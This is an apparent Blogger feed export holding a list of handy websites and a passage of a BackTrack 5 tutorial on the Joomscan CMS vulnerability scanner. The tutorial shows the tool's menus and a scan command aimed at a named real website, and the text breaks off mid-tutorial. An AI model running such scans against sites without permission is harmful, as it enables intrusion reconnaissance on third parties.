<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-1282681386430893595</id><updated>2024-11-05T18:52:25.803-08:00</updated><category term="General"/><category term="Computerz"/><category term="Hacking"/><category term="BackTrack"/><title type='text'>Tech Start X</title><subtitle type='html'>Tipz / Trickz / Tutorialz</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default?start-index=26&amp;max-results=25'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>115</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-1572688191141517291</id><published>2013-10-10T13:32:00.000-07:00</published><updated>2014-02-18T22:40:55.343-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="General"/><title type='text'>Usefull Websites for Tech Life</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK8NT0WyQfaSEhQYV22TeuQql6ThFck2sSoH8bIjLn0ZxnqH0R5sy82pVY56KRSoxbb-vdrtrNIHLTFINwBXcqESoB9LEv6U1vFwnz-GiDzaMN6M-G36BQOvyT0h9mXseHo-IHf3991pk/s1600/useful_websites_D.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK8NT0WyQfaSEhQYV22TeuQql6ThFck2sSoH8bIjLn0ZxnqH0R5sy82pVY56KRSoxbb-vdrtrNIHLTFINwBXcqESoB9LEv6U1vFwnz-GiDzaMN6M-G36BQOvyT0h9mXseHo-IHf3991pk/s400/useful_websites_D.jpg&quot; height=&quot;88&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;Clip Converter&amp;nbsp;is a
free online media conversion application, which allows you to reocord, convert
and download nearly any audio or video URL to common formats.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;&lt;a href=&quot;http://www.clipconverter.cc/&quot;&gt;&lt;span style=&quot;color: windowtext;&quot;&gt;www.clipconverter.cc&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;background-color: white; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;Are&lt;/span&gt;&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;&amp;nbsp;&lt;span style=&quot;background: white;&quot;&gt;&amp;nbsp;you
getting the speed you pay for? Our&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background: white; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Promise Index™&lt;/span&gt;&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;&amp;nbsp;&lt;span style=&quot;background: white;&quot;&gt;and Ookla Speedtest help keep
your ISP honest! You can help too and join over 250 million others like you who
want to test or troubleshoot their Internet connection.&lt;/span&gt;&amp;nbsp;&lt;span style=&quot;background: white;&quot;&gt;What&#39;s your&lt;/span&gt;&amp;nbsp;&lt;span style=&quot;background: white;&quot;&gt;Speed?&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;&lt;a href=&quot;http://www.speedtest.net/&quot;&gt;&lt;span style=&quot;color: windowtext;&quot;&gt;www.speedtest.net&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;background-color: white; background-position: initial initial; background-repeat: initial initial; font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;AddMeFast
is a network that will help you grow your social presence. We allow you to look
and choose who you want to like/subscribe/follow/view and skip those who you
are not interested in.&lt;/span&gt;&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;&lt;a href=&quot;http://www.addmefast.com/&quot;&gt;&lt;span style=&quot;color: windowtext;&quot;&gt;www.addmefast.com&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;Online HTML Editor here
you can write and see HTML in action.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;&lt;a href=&quot;http://www.onlinehtmleditor.net/&quot;&gt;&lt;span style=&quot;color: windowtext;&quot;&gt;www.onlinehtmleditor.net&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;Creating a Cool Facebook
Timeline Cover for Fun or Business has Never Been Easier!&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;With our powerful
editor, you can create an integrated looking between your Facebook cover and
Profile picture&amp;nbsp;without any Branding or advertisement watermark from us&amp;nbsp;for
free!&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;&lt;a href=&quot;http://www.timelinecoverbanner.com/&quot;&gt;&lt;span style=&quot;color: windowtext;&quot;&gt;www.timelinecoverbanner.com&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;HitLeap is a Traffic
Exchange, also known as an autohits service&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;We help you increase
your website hits, rankings (Alexa, Google) and more.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;Our affiliate program gives
cash and traffic commissions of up to 50%.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;&lt;span style=&quot;color: windowtext;&quot;&gt;&lt;a href=&quot;http://www.hitleap.com/&quot;&gt;www.hitleap.com&lt;/a&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;div class=&quot;MsoNoSpacing&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;&quot;&gt;Marathi
Changathi is a&lt;span style=&quot;background: white;&quot;&gt;&amp;nbsp;tool for marathi translation
from&amp;nbsp;&lt;b&gt;english to marathi&lt;/b&gt;&amp;nbsp;powered by google.&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNoSpacing&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt;&quot;&gt;&lt;a href=&quot;http://www.marathi.changathi.com/&quot;&gt;www.marathi.changathi.com&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNoSpacing&quot;&gt;



&lt;/div&gt;
&lt;div class=&quot;MsoNoSpacing&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNoSpacing&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;span style=&quot;font-family: Arial, sans-serif; font-size: x-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Arial, sans-serif; font-size: x-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/1572688191141517291/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2013/10/usefull-websites-for-tech-life.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/1572688191141517291'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/1572688191141517291'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2013/10/usefull-websites-for-tech-life.html' title='Usefull Websites for Tech Life'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK8NT0WyQfaSEhQYV22TeuQql6ThFck2sSoH8bIjLn0ZxnqH0R5sy82pVY56KRSoxbb-vdrtrNIHLTFINwBXcqESoB9LEv6U1vFwnz-GiDzaMN6M-G36BQOvyT0h9mXseHo-IHf3991pk/s72-c/useful_websites_D.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-6825470064373086606</id><published>2012-05-26T06:26:00.001-07:00</published><updated>2013-08-24T04:15:37.380-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="BackTrack"/><title type='text'>Joomscan On Backtrack 5R1</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: x-large;&quot;&gt;JoomScan&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;..:: Is a Vulnerability Scanning Tool ::..&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcgj157cxndydVeC19UySPE7fKu5qtKlgUyTQ92ehq1bgykQQILwHf5xRUTXrxRv67MXe0pLQKKjomAbG85xv0OBTwP3P9fCryaKaC11bZPjrkON9okVePe2WJrPyl9vYErFc4RdAQgNg/s1600/untitled.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcgj157cxndydVeC19UySPE7fKu5qtKlgUyTQ92ehq1bgykQQILwHf5xRUTXrxRv67MXe0pLQKKjomAbG85xv0OBTwP3P9fCryaKaC11bZPjrkON9okVePe2WJrPyl9vYErFc4RdAQgNg/s640/untitled.JPG&quot; height=&quot;371&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;










&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;Introduction&amp;nbsp;&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;Joomscan is the CMS Vulnerability Identification Tool .&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;This tool is created by YGN Ethical Hacker Group from Myanmar(Burma).&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;Joomscan is used to find the vulnerability in the websites .&amp;nbsp;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;Joomscan helps the developer to find the weaknesses in the websites .&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;Joomscan is a signature based scanner which can detect the XSS/CSRF, sql injection etc on the target website .&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;










&lt;span style=&quot;font-family: &#39;Courier New&#39;,Courier,monospace;&quot;&gt;How to open Joomscan on Backtrack 5&amp;nbsp;&lt;/span&gt;&lt;/h3&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;Follow : Backtrack &amp;gt;&amp;nbsp;Vulnerability Assessment &amp;gt; Web Assessment &amp;gt; CMS Vulnerability Identification Tool &amp;gt; joomscan&amp;nbsp;&lt;/span&gt;&lt;/li&gt;
&amp;nbsp;&lt;/ul&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;&amp;nbsp;&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkar41viTPlFao-yqJ6NegMo_BHGJHry7VtAKpE9hHxBoIY08ruOlMaACnigfGTqza2hayG1JDdQBpMLAvg7n7iOdvtZe_mChx5z5rYprLvKEitFVtWzltBNejj_mPjqQgTIEA3QltHhc/s1600/way.JPG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkar41viTPlFao-yqJ6NegMo_BHGJHry7VtAKpE9hHxBoIY08ruOlMaACnigfGTqza2hayG1JDdQBpMLAvg7n7iOdvtZe_mChx5z5rYprLvKEitFVtWzltBNejj_mPjqQgTIEA3QltHhc/s640/way.JPG&quot; height=&quot;378&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;










&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif; font-weight: normal;&quot;&gt; &lt;/span&gt;&lt;/h3&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;


&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif; font-weight: normal;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;


&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif; font-weight: normal;&quot;&gt;How to Use joomscan&amp;nbsp;&lt;/span&gt;&lt;/h3&gt;
&lt;div&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif; font-weight: normal;&quot;&gt;When you open joomscan , it will look like this image (shown below)&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjobN7vu1986GiR9NmqCFBFcKt5Lf1B7IGEd-ipW9Y3Kng5OWnoVp500oUaaghgXv9e1aqcjrvK-aHQcEqmX4mWrmIMj47RaYjUtMx64gB2l7X4ljrRo8t_ZaJ7t_hmwslYwD4S8TJ-3oI/s1600/joomscan1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjobN7vu1986GiR9NmqCFBFcKt5Lf1B7IGEd-ipW9Y3Kng5OWnoVp500oUaaghgXv9e1aqcjrvK-aHQcEqmX4mWrmIMj47RaYjUtMx64gB2l7X4ljrRo8t_ZaJ7t_hmwslYwD4S8TJ-3oI/s1600/joomscan1.jpg&quot; /&gt;&lt;/a&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkar41viTPlFao-yqJ6NegMo_BHGJHry7VtAKpE9hHxBoIY08ruOlMaACnigfGTqza2hayG1JDdQBpMLAvg7n7iOdvtZe_mChx5z5rYprLvKEitFVtWzltBNejj_mPjqQgTIEA3QltHhc/s1600/way.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOu-K9fqMliYxs2afXGqOdUZvlUOYn0pXEGT2xP-4QgyIHme2jxKDowGjxBccMktqej7svRzbeDOBqppmmSINeoMi9_ks8RHSq7Y98joVyJC5C1f1Y-V_n049bckjTyLh1yudjgEvk8EI/s1600/joomscan1.1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOu-K9fqMliYxs2afXGqOdUZvlUOYn0pXEGT2xP-4QgyIHme2jxKDowGjxBccMktqej7svRzbeDOBqppmmSINeoMi9_ks8RHSq7Y98joVyJC5C1f1Y-V_n049bckjTyLh1yudjgEvk8EI/s1600/joomscan1.1.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;The above image shows the syntax and the options&amp;nbsp;&lt;/span&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4Im6hBbaR7d3RtPdndRh2KLY7Db87DGIwBEz4BfGsDy5j1n1cV4e58J-pyOFgofbjWL1fk2EAYLTMW2Q75GLW6qXzP2ot8Xmo05zGKU3FCheo1ozmOUVaXOmLXakgy2BNEsMsmzFb5Nc/s1600/joomscan2.jpg&quot; /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;Some more options like check ,update, about and read (shown above)&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;&amp;nbsp;&lt;/span&gt; &lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZy92jO4Fc4mbVqlSu-J3BFjBsCGhSURYjLXuKyqz7D2fG_eMWbU-h0OG5cGPffE6q_VmrseoEnQo2cJvNpTD1YlNHfRIy7IC6-8KsTCSOV9SA8Iuaw48m43VO5ffvFHNt-vV58-cfSSw/s1600/joomscan3.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZy92jO4Fc4mbVqlSu-J3BFjBsCGhSURYjLXuKyqz7D2fG_eMWbU-h0OG5cGPffE6q_VmrseoEnQo2cJvNpTD1YlNHfRIy7IC6-8KsTCSOV9SA8Iuaw48m43VO5ffvFHNt-vV58-cfSSw/s1600/joomscan3.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;In the above image ,we are giving the command : ./joomscan -u &amp;lt; target url &amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;u&gt;Example &lt;/u&gt;&lt;/span&gt;

&lt;span style=&quot;font-size: small;&quot;&gt;: ./joomscan.pl -u &amp;nbsp;www.plusline.org &amp;nbsp; &amp;nbsp; as shown in the image above .&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;
Here ./joomscan.pl : used to start the joomscan&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt; -u : used for url&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
